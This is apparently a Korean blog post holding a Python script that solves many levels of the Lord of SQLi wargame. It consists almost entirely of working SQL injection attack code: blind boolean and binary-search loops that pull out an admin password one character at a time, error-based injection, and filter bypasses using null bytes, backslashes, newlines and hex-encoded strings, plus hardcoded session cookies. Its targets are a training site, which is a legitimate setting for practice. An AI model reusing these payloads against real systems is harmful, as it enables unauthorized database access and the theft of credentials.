웹/SQL injection
LOS org~darkeyes
shnec
2017. 8. 3. 20:31
import requests
import time
s=requests.session()
cookie={'__cfduid':'d392d5cf39f2a1476ffb7cf441ad0da3b1501471981','PHPSESSID':'2h91mockfjn960lg20cl338712'}
password=''
#orc
def org():
for ind in range(1,50):
for x in range(0x20,0x80):#0x80):
res=requests.get('http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php',params={"pw":"1\'||id=0x61646d696e and (select ascii(substr(pw,{},1)))={}#".format(ind,x)},cookies=cookie).text
if 'Hello admin' in res:
print x
print '[**]'+chr(x)
password+=chr(x)
print 'password: '+password
break
if x==0x7f:
print '[xx]'
break
#orge
def orge():
for ind in range(1,10):
for x in range(0x20,0x80):#0x80):
res=requests.get('http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php',params={"pw":"1'||id=0x61646d696e&&(select ascii(substr(pw,{},1)))={}#".format(ind,x)},cookies=cookie).text
if 'Hello admin' in res:
print x
print '[**]'+chr(x)
password+=chr(x)
print 'password: '+password
break
if x==0x7f:
print '[xx]'
break
#golem
#https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=123%27||id%20like%20%27admin%27%26%26ascii(mid(pw,1,1))>0%23
def golem():
for ind in range(1,10):
for x in range(0x20,0x80):#0x80):
res=requests.get('http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php',params={"pw":"123'||id like 'admin'&&ascii(mid(pw,{},1)) like {}#".format(ind,x)},cookies=cookie).text
if 'Hello admin' in res:
print x
print '[**]'+chr(x)
password+=chr(x)
print 'password: '+password
break
if x==0x7f:
print '[xx]'
break
#darknight
#https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?
def darknight():
password=''
for ind in range(1,10):
for x in range(0x20,0x80):#0x80):
res=requests.get('https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php',params={"pw":"123","no":"123||id like 0x61646d696e&&ord(mid(pw,{},1)) like {}#".format(ind,x)},cookies=cookie).text
if 'Hello admin' in res:
print x
print '[**]'+chr(x)
password+=chr(x)
print 'password: '+password
break
if x==0x7f:
print '[xx]'
break
print res
def bugbear():
password=''
for ind in range(1,10):
p=0
for x in range(7,-1,-1):
param={"pw":"123","no":"1||no>1&&hex(mid(pw,{},1))<{}#".format(ind,hex(p+2**x)[2:])}
res=requests.get('https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php',params=param,cookies=cookie).text
if 'Hello admin' not in res:
p+=2**x
print '[**]'+chr(p)
password+=chr(p)
print 'password: '+password
print res
def giant():
password=''
param={'shit':chr(0xb)}
res=requests.get('https://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php',params=param,cookies=cookie).text
print res
string='0123456789abcdefghijklmnopqrstuvwxyz'#ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def assassin():
password=''
for i in range(10):
#for x in range(0x20,0x80):
for c in string:
param={'pw':password+c+'%'}
#print param
res=requests.get('https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php',params=param,cookies=cookie).text
#print res
if 'Hello ' in res:
if 'Hello admin' in res:
x=c
break
x=c
password+=x
print 'password :'+password
def zombie_assassin():
password=''
param={'id':'guest','pw':"{}'||1#'".format(chr(0x0))}
res=requests.get('https://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php',params=param,cookies=cookie).text
print res
def succubus():
password=''
param={'id':'\\','pw':"||1=1#"}
res=requests.get('https://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php',params=param,cookies=cookie).text
print res
def nightmare():
password=''
param={'pw':"')=0;{}".format(chr(0))}
res=requests.get('https://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php',params=param,cookies=cookie).text
print res
def xavis():
password=''
for ind in range(1,51):
p=0
for x in range(10,-1,-1):
param={'pw':"12'||id='admin'&&ord(substr(pw,{},1))<{}#".format(ind,p+2**x)}
res=requests.get('https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php',params=param,cookies=cookie).text
#print res
#raw_input('>')
if 'Hello admin' not in res:
p+=2**x
print p
print '[**]'+hex(p)
password+=hex(p)[2:]+' '
print 'password: '+password
print res
def hexor():
param={'id':"123' union select 2,",'pw':"#"}
password=''
for ind in range(1,10):
p=0
for x in range(7,-1,-1):
param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)}
res=requests.get('http://13.124.1.51/web/prob15/?id=info',params=param).text
if 'Hello guest' not in res:
p+=2**x
#print p
print res
#time.sleep(10000)
print p
print '[**]'+chr(p)
password+=chr(p)
print 'password: '+password
def dragon():
param={'pw':"1'\n||id='admin' order by id#"}
res=requests.get('https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php',params=param,cookies=cookie).text
print res
def iron_golem():
password=''
for ind in range(1,51):
p=0#ascii(substr(pw,{},1))<{}
for x in range(10,-1,-1):
param={'pw':"123'||id='admin'&&(select if(ord(substr(pw,{},1))={}&&id='admin',True,(select 1 union select 2)))#".format(ind,p+2**x)}
res=requests.get('https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php',params=param,cookies=cookie).text
if 'Subquery returns more than 1 row' in res:
p+=2**x
print res
time.sleep(1000)
print p
print '[**]'+hex(p)
password+=hex(p)[2:]+' '
print 'password: '+password
def dark_eyes():
password=''
for ind in range(1,51):
p=0
for x in range(10,-1,-1):
param={'pw':"123'||id='admin'&&(select ord(substr(pw,{},1))<{} union select 1)#".format(ind,p+2**x)}
res=requests.get('https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php',params=param,cookies=cookie).text
if '
query : ' not in res:
p+=2**x
print p
print '[**]'+chr(p)
password+=chr(p)
print 'password: '+password
print res
def umaru():
password=''
param={'flag':"select 1 union select 2"}
res=requests.get('https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php',params=param,cookies=cookie).text
print res
#hexor()
#dragon()
#xavis()
#iron_golem()
#dark_eyes()
umaru()
#"' or if((select id='admin' and substr(pw,1,1)='a',true,(select 1 union select 2)))